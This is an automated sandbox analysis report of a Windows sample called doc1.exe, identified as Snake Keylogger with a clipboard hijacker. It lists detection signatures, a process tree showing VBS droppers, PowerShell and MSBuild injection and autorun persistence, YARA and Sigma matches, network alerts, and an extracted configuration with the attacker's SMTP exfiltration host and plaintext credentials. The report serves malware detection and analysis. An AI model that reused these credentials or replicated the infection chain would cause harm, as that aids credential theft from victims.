Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc1.exe

Overview

General Information

Sample name:doc1.exe
Analysis ID:1500036
MD5:fddd99d918c32a807cd1761c519b086b
SHA1:8cf7e4c454f20d2ab851bb6e18a4250b7af4157c
SHA256:5cd8e28712872382cacac0d338a4d041e291b89d41a4daf69eabefe7ec46f920
Tags:exeSnakeKeylogger
Infos:

Detection

Clipboard Hijacker, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected Clipboard Hijacker
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • doc1.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\doc1.exe" MD5: FDDD99D918C32A807CD1761C519B086B)
    • wscript.exe (PID: 6504 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
    • InstallUtil.exe (PID: 5392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6840 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3508 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 4896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 4884 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 3576 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 2188 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 400 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 2744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 2420 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 6756 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 6452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 2744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 2888 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 2548 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 5984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 6716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 4632 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 2744 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 2420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 4160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 2496 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 4568 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1300 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • bosotkm.exe (PID: 1864 cmdline: "C:\Users\user\AppData\Roaming\bosotkm.exe" MD5: FDDD99D918C32A807CD1761C519B086B)
    • InstallUtil.exe (PID: 948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • bosotkm.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Roaming\bosotkm.exe" MD5: FDDD99D918C32A807CD1761C519B086B)
    • InstallUtil.exe (PID: 1596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • rundll32.exe (PID: 3640 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • svchost.exe (PID: 352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sendxbacklog@zulpine.shop", "Password": "dkA6kDAnLHNg", "Host": "zulpine.shop", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x18aed:$a1: get_encryptedPassword
      • 0x18dd9:$a2: get_encryptedUsername
      • 0x188f9:$a3: get_timePasswordChanged
      • 0x189f4:$a4: get_passwordField
      • 0x18b03:$a5: set_encryptedPassword
      • 0x1a13f:$a7: get_logins
      • 0x1a0a2:$a10: KeyLoggerEventArgs
      • 0x19d0d:$a11: KeyLoggerEventArgsEventHandler
      00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x1c464:$x1: $%SMTPDV$
      • 0x1c4ca:$x2: $#TheHashHere%&
      • 0x1daf3:$x3: %FTPDV$
      • 0x1dbe7:$x4: $%TelegramDv$
      • 0x19d0d:$x5: KeyLoggerEventArgs
      • 0x1a0a2:$x5: KeyLoggerEventArgs
      • 0x1db17:$m2: Clipboard Logs ID
      • 0x1dd37:$m2: Screenshot Logs ID
      • 0x1de47:$m2: keystroke Logs ID
      • 0x1e121:$m3: SnakePW
      • 0x1dd0f:$m4: \SnakeKeylogger\
      00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 67 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        21.2.InstallUtil.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          1.2.doc1.exe.56f0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            12.2.MSBuild.exe.9d0000.0.unpackJoeSecurity_Clipboard_Hijacker_1Yara detected Clipboard HijackerJoe Security
              1.2.doc1.exe.3c2d068.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                1.2.doc1.exe.3c2d068.4.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                  Click to see the 24 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_3508.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_2188.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_6756.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_2548.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_2744.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  Click to see the 1 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
                  Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, SourceProcessId: 2420, StartAddress: 7311B510, TargetImage: C:\Windows\System32\wermgr.exe, TargetProcessId: 2420
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6504, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49715
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper - File
                  Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6504, TargetFilename: C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\bosotkm.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\doc1.exe, ProcessId: 6400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bosotkm
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6504, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49715
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6840, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 3508, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 352, ProcessName: svchost.exe

                  Suricata Signatures

                  Timestamp:2024-08-27T20:03:17.501424+0200
                  SID:2803274
                  Severity:2
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:48.769226+0200
                  SID:2803305
                  Severity:3
                  Source Port:49760
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:50.512395+0200
                  SID:2803305
                  Severity:3
                  Source Port:49764
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:39.720201+0200
                  SID:2803274
                  Severity:2
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:48.682864+0200
                  SID:2803305
                  Severity:3
                  Source Port:49759
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:53.734932+0200
                  SID:2803305
                  Severity:3
                  Source Port:49768
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:21.704538+0200
                  SID:2803274
                  Severity:2
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:41.556919+0200
                  SID:2803305
                  Severity:3
                  Source Port:49747
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:40.339749+0200
                  SID:2803305
                  Severity:3
                  Source Port:49745
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:57.238554+0200
                  SID:2803305
                  Severity:3
                  Source Port:49774
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:48.079577+0200
                  SID:2803274
                  Severity:2
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:20.034815+0200
                  SID:2803274
                  Severity:2
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:49.884414+0200
                  SID:2803274
                  Severity:2
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:40.985840+0200
                  SID:2803274
                  Severity:2
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:51.727380+0200
                  SID:2803305
                  Severity:3
                  Source Port:49766
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:24.314221+0200
                  SID:2803305
                  Severity:3
                  Source Port:49728
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:42.776244+0200
                  SID:2803305
                  Severity:3
                  Source Port:49751
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:42.188993+0200
                  SID:2803274
                  Severity:2
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:50.431489+0200
                  SID:2803305
                  Severity:3
                  Source Port:49763
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:46.876469+0200
                  SID:2803274
                  Severity:2
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:23.563943+0200
                  SID:2803274
                  Severity:2
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:46.548131+0200
                  SID:2803305
                  Severity:3
                  Source Port:49755
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:20.617307+0200
                  SID:2803305
                  Severity:3
                  Source Port:49721
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:22.289776+0200
                  SID:2803305
                  Severity:3
                  Source Port:49725
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:29.195692+0200
                  SID:2803305
                  Severity:3
                  Source Port:49736
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:38.688943+0200
                  SID:2803274
                  Severity:2
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendxbacklog@zulpine.shop", "Password": "dkA6kDAnLHNg", "Host": "zulpine.shop", "Port": "587", "Version": "5.1"}
                  Multi AV Scanner detection for dropped file
